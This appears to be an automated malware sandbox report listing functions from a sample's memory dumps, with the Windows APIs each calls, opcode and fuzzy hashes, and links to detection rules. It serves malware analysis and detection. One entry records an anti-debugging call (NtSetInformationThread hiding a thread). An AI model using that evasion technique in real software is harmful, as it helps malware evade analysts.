Function 023206C4, Relevance: 1.5, APIs: 1, Instructions: 25nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(023206F0,?,00000000,?,?,?,?,?,?,?,02320375), ref: 023206CD
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 107c8b3396cdd0aba5839a98c48210050f0afc305b2b2e6bfa1787959393e50e
Instruction ID: 55b248eba06ac78ecf6326846ef751b67034cdfa3f8bdc07b185704680fedebe
Opcode Fuzzy Hash: 107c8b3396cdd0aba5839a98c48210050f0afc305b2b2e6bfa1787959393e50e
Instruction Fuzzy Hash: 41E0863D6057115FDE609A2498517D773A1EF5A325F601A18DCB9DB380DB35C88ECE00

Uniqueness

Uniqueness Score: -1.00%

Function 02326814, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,023203F7,00000000), ref: 02326846

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 83d324819f8541d6709a4b11c7452a0a0edd113038e0b6b6760aff33afe9278c
Instruction ID: 163bbae98eee8da18e02944815614872f739607af56a74a8df5fb6d92a020fbd
Opcode Fuzzy Hash: 83d324819f8541d6709a4b11c7452a0a0edd113038e0b6b6760aff33afe9278c
Instruction Fuzzy Hash: 47E08C70651629ABDF306B76EC9AFCE37269F453A4B988102AC508A118CB38844D8F92

Uniqueness

Uniqueness Score: -1.00%

Function 02326741, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,023203F7,00000000), ref: 02326846

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fe318d119f75dce9cb4f4a96631544f6a9fbf6662013cadb6f7604e37171d968
Instruction ID: f5263056d47fc761642cf3d47b3b41ee2b1da20fd8539ea228d056ffb6257b51
Opcode Fuzzy Hash: fe318d119f75dce9cb4f4a96631544f6a9fbf6662013cadb6f7604e37171d968
Instruction Fuzzy Hash: 8DC08C705920362EDF302F346D46BDF2B1D8E05BB1FA84204B811C30D003108D88CD22

Uniqueness

Uniqueness Score: -1.00%

Function 02323B3E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,?,00000000,?,00003000,00000004,?,00000000,?,00001000), ref: 02323B4E

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 766ae539ebbd1eff33de9917f462205ebea6be616ae80bb4b873479f95464732
Instruction ID: 68e185da2e2d8045510ed931d01f69126108196f678300ce60dd1f9513470362
Opcode Fuzzy Hash: 766ae539ebbd1eff33de9917f462205ebea6be616ae80bb4b873479f95464732
Instruction Fuzzy Hash: 8FC0923438631129EB240A754CC9B8A26859F8AE71F788B14BCAEB91D5C7A0C4896200

Uniqueness

Uniqueness Score: -1.00%

Function 0040723B, Relevance: 1.5, APIs: 1, Instructions: 211memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6094f2c2633be344c1f6be2956511b49fd6abc3200e7a168fe09b22862109375
Instruction ID: 177d2a2920cb32dad0cd9e97d851c565b70cac9144456b2c542792b894eb7b23
Opcode Fuzzy Hash: 6094f2c2633be344c1f6be2956511b49fd6abc3200e7a168fe09b22862109375
Instruction Fuzzy Hash: 104117B2F4E502CEE3145A44A890B307A31AB47344FB169BB89073A4D2D67C3903FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00407173, Relevance: 1.4, APIs: 1, Instructions: 176memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1118cc1185e7db022c24573da25b7c7fe3f3e1b98b60031d3a1612b8e84e2a0e
Instruction ID: 4f0c16aaebda1f558d5bb8bf19f04c138d75979565752556b6f7a30f78f0fa2b
Opcode Fuzzy Hash: 1118cc1185e7db022c24573da25b7c7fe3f3e1b98b60031d3a1612b8e84e2a0e
Instruction Fuzzy Hash: F34107B2F4E501CBE3245A44A890B307931AB47344FB169BB89073A5D2E27C3943FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407145, Relevance: 1.4, APIs: 1, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0a2bf0256e40af1bfc65c288dd0588263bf09a8c664b9d839bf943f157d80c64
Instruction ID: e8fb05738a33befec07f452ad5ce17909e449a2bb79b7625f7be5c284293a779
Opcode Fuzzy Hash: 0a2bf0256e40af1bfc65c288dd0588263bf09a8c664b9d839bf943f157d80c64
Instruction Fuzzy Hash: 7B41F8B2F4E501CBE3245A54A890B307A31AB47344FB169BB89073A5D2D27C3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004072A7, Relevance: 1.4, APIs: 1, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e8fcb56063ca469091cae9f24ea225f8d5acc98c807be118a541357fc942a5b1
Instruction ID: 460ee251eccd875c3707f793a12f6a6a276cae9cc63a59987a178df5b2efe08b
Opcode Fuzzy Hash: e8fcb56063ca469091cae9f24ea225f8d5acc98c807be118a541357fc942a5b1
Instruction Fuzzy Hash: CE31F9B2F4E502CEE3545A44A890B307A31A747344FB169BB89073A5D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040715E, Relevance: 1.4, APIs: 1, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bd137f64df72efe5db4aa08c3ab411fc1259d0bd04e2290aa1b4a1fe8c28e3e5
Instruction ID: ecc95ca6e5456a2b2f67bd29f0baf9c8245bcbc7033c141921ae9aa740c4b965
Opcode Fuzzy Hash: bd137f64df72efe5db4aa08c3ab411fc1259d0bd04e2290aa1b4a1fe8c28e3e5
Instruction Fuzzy Hash: 07412AB2F4E101CBE3245A44A890B707A31A747344FB169BB89073A5D2D27C3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004071CC, Relevance: 1.4, APIs: 1, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 64679809ef807ac358b7ba38421ca1aecc86aa7eb1f59e4e5733699430544fb8
Instruction ID: acfeee75fb893439d069bf95ac4ceda4b8fd51ae9ad5fca8f5982bcf9c5655e0
Opcode Fuzzy Hash: 64679809ef807ac358b7ba38421ca1aecc86aa7eb1f59e4e5733699430544fb8
Instruction Fuzzy Hash: 674126B2F4E501CAE3544A54A884B307A30AB47344FB169BB99073A4D2E77C7943BA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00407128, Relevance: 1.4, APIs: 1, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1f1067a25440691b3a79788cfc71cf8776fe33cba7432a50c6f961e5f719a7d
Instruction ID: 7cacbdd8e4fe1bd3330e61e48d437331a18a3aff3d7c86198fa3848f812a70dd
Opcode Fuzzy Hash: b1f1067a25440691b3a79788cfc71cf8776fe33cba7432a50c6f961e5f719a7d
Instruction Fuzzy Hash: FC411AB2F4E101CBE3145A54A8807307631A747344FB165BB89073A5D2D27C7943FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004072CF, Relevance: 1.4, APIs: 1, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b0e13eac352858cf27dfab9267fe105118990844822fd7d472590a20f2b7c72b
Instruction ID: 193ad01e3a6819dc3b91db1d7fc4a7b37500619024d45d45b088de0d356c4110
Opcode Fuzzy Hash: b0e13eac352858cf27dfab9267fe105118990844822fd7d472590a20f2b7c72b
Instruction Fuzzy Hash: EA3109B2F4E502CEE3545A44A890B707931A747344FB168BB89073A5D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040713A, Relevance: 1.4, APIs: 1, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0d36dc56d71c4702349f12ae91f73ebcd875a461dc6df5e5453af2e91cbb4392
Instruction ID: a77aa6ba43a5408bd33f6f59a3b22d64481a7879e61b6c2c517c898b3003554d
Opcode Fuzzy Hash: 0d36dc56d71c4702349f12ae91f73ebcd875a461dc6df5e5453af2e91cbb4392
Instruction Fuzzy Hash: B64107B2F4E501CBE3245A54A880B307931AB47344FB169BB89073A5D2E37D3903BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040735F, Relevance: 1.4, APIs: 1, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6f89b009d3da2816e11755ecca14ccae3a036bcd2cca163dfb0c66b02d5c122b
Instruction ID: 3decb3876eaa65c841f410558e921e232558018f0ebbfeaa8fc7868c1480932d
Opcode Fuzzy Hash: 6f89b009d3da2816e11755ecca14ccae3a036bcd2cca163dfb0c66b02d5c122b
Instruction Fuzzy Hash: C63107B2F4E502CEE3245A44A490B307A31AB47344FB168BB89073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407291, Relevance: 1.4, APIs: 1, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 606140f0625b677936b343da4d8bde65bbc8383cf1371237626e8f201f528e01
Instruction ID: ac3cd79ba156d9a8df5ac9daf3fa4052c9b5676d7015d76e18b609be50a614aa
Opcode Fuzzy Hash: 606140f0625b677936b343da4d8bde65bbc8383cf1371237626e8f201f528e01
Instruction Fuzzy Hash: 9F4108B2F4E502CEE3145A44A890B307A31AB47344FB169BB89073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004072F4, Relevance: 1.4, APIs: 1, Instructions: 132memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 91f50728e4f6743d3e230d60e69ff8f0db4e5197217f029184daa6f01e3ac771
Instruction ID: 3a7448b27889d7fd95762eb7f2f843c986c8830b985f0ca4d64e06a020496e93
Opcode Fuzzy Hash: 91f50728e4f6743d3e230d60e69ff8f0db4e5197217f029184daa6f01e3ac771
Instruction Fuzzy Hash: 0D31F8B2F4E502DEE3545A54A490B307A31AB47344FB168BB89073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407381, Relevance: 1.4, APIs: 1, Instructions: 130memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc2b9cb08b0cbfb708757394799f3c9d025bc9e4f38d04802f287a9d1abf689c
Instruction ID: 795a907b0bb8fa45ae77ddb17d45b86baab62ae61219f4106a7460aaaaf60a35
Opcode Fuzzy Hash: bc2b9cb08b0cbfb708757394799f3c9d025bc9e4f38d04802f287a9d1abf689c
Instruction Fuzzy Hash: 1431E6B2F4E502DEE3245A54A890B707A31AB47344FB168BB85073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407402, Relevance: 1.4, APIs: 1, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2e59a1397f2975536e3aa139fa33935fedc74e67619dd3a53766b880f3dea96
Instruction ID: 7b5296b74b0ef7ac86c873105b96b0f7d10cd22ed52e179cf62987e80620161d
Opcode Fuzzy Hash: c2e59a1397f2975536e3aa139fa33935fedc74e67619dd3a53766b880f3dea96
Instruction Fuzzy Hash: 05311AB2F4E502DFE3145A54A890B307A31AB47344FB168BB85073A4D2D67D3943BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004073E7, Relevance: 1.4, APIs: 1, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a4c96c28802b23a488ccde07b64dc5290e02399a24d9409cd7298cc44278fa24
Instruction ID: 89f682461856988c49f63425cabe987f23e6d55463ff4d99c591d056f1061397
Opcode Fuzzy Hash: a4c96c28802b23a488ccde07b64dc5290e02399a24d9409cd7298cc44278fa24
Instruction Fuzzy Hash: 263109B2F4E502DFE3145A54A890B307A31AB47344FB168BB85073A4D2D67D3943BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040745A, Relevance: 1.4, APIs: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fc0481017190857e4a388f8cb38cce90f666dd21c23c7fe125d4f415099f1827
Instruction ID: 60dc8c81e5f6295b59e5796c9bec1cf3ed49794db5423f4b91cf464a897b6dc2
Opcode Fuzzy Hash: fc0481017190857e4a388f8cb38cce90f666dd21c23c7fe125d4f415099f1827
Instruction Fuzzy Hash: 3F2119B2F4E502DFE3145A44A894B707631AB47344FB168BB85073A4D2D67D3903BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004073D9, Relevance: 1.4, APIs: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 76d126d1b694409b5c7043dc1ecc9255937f3bccd2e7488460c9c6e45991b787
Instruction ID: 7f470277efd66d83f01d0ab19753b3431a6d84182cf2feb6ff26d62b6dfd28fc
Opcode Fuzzy Hash: 76d126d1b694409b5c7043dc1ecc9255937f3bccd2e7488460c9c6e45991b787
Instruction Fuzzy Hash: F13118B1F4E501DEE3145A44A890B307A31AB47344FB168BB85073A4D2D63D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004075B1, Relevance: 1.4, APIs: 1, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b9197b418fdc936904bba5df776fcfb88170ee3afc337cf2a2174b9e3f118414
Instruction ID: ad23a373ac327d626383041d686f7fd99fd01a67a90278fa7e1ca9afc9585cd3
Opcode Fuzzy Hash: b9197b418fdc936904bba5df776fcfb88170ee3afc337cf2a2174b9e3f118414
Instruction Fuzzy Hash: 6C212CB2F5E502CEE3645A44A494A347670AB43384FB164BF86073A0D2D63D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407399, Relevance: 1.4, APIs: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1869a1d612786b830ccd49eba09c4b1c949d4561a11895b59bab5f68c0f9db71
Instruction ID: 96611039eb0416cde88a73f59856f4ea17424711168115a4a6e51e5d79e224f1
Opcode Fuzzy Hash: 1869a1d612786b830ccd49eba09c4b1c949d4561a11895b59bab5f68c0f9db71
Instruction Fuzzy Hash: DE3108B2F4E502DEE3245A44A890B307A31AB47344FB168BB85073A4D2D67D3903FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040748F, Relevance: 1.4, APIs: 1, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 278a3b61e652b6b45873759c31319bd7e8183576960d302fe9b3b2993a884079
Instruction ID: 56e66b55b6918b5d39bd36fef1d9f2e938b7e8b96076918605d667ec38559646
Opcode Fuzzy Hash: 278a3b61e652b6b45873759c31319bd7e8183576960d302fe9b3b2993a884079
Instruction Fuzzy Hash: 532128B2F4E502DEE3145A44A494B307630AB47344FB168BB82073A4D2D63D3903BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407420, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c3328ffd45dfc0d1aa6a2bbf70d231df4dc15fe436d5ba1641764ef666c60311
Instruction ID: 66988d35878d9efe4015109cf9e38cb090251170df67102978bb2c66ca5fd0a4
Opcode Fuzzy Hash: c3328ffd45dfc0d1aa6a2bbf70d231df4dc15fe436d5ba1641764ef666c60311
Instruction Fuzzy Hash: E5315EB1F4E501DFD3145A44A494B307530A747384FB1687B85073A4D2D63D3903BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407448, Relevance: 1.4, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2b6c94a5de5a20702bda43a286a5a5a0febb3f4de95a387ede0dc614a474c0e6
Instruction ID: 460b8aaec037ef3a96cb04d65a0db679dea5d08c457c0f5d867716ac3b7d1df3
Opcode Fuzzy Hash: 2b6c94a5de5a20702bda43a286a5a5a0febb3f4de95a387ede0dc614a474c0e6
Instruction Fuzzy Hash: CF213CB1F4E502DFE3145A44A890B307530AB47344FB168BB85073A4D2D63D3903BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 004075FC, Relevance: 1.3, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 41b016d63ea0ef435013902f873d50cb8a666a54f0dac76f31d0551dbac825c7
Instruction ID: fd9a03ed1950fcb25c73364e9caf3a0c7a46d96186eebc351dde19e3ed455893
Opcode Fuzzy Hash: 41b016d63ea0ef435013902f873d50cb8a666a54f0dac76f31d0551dbac825c7
Instruction Fuzzy Hash: 98212CB2F5E502CEE3645A54A494A307A70AB43384FB164BF86033A0D2D63D3943FA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0040759F, Relevance: 1.3, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

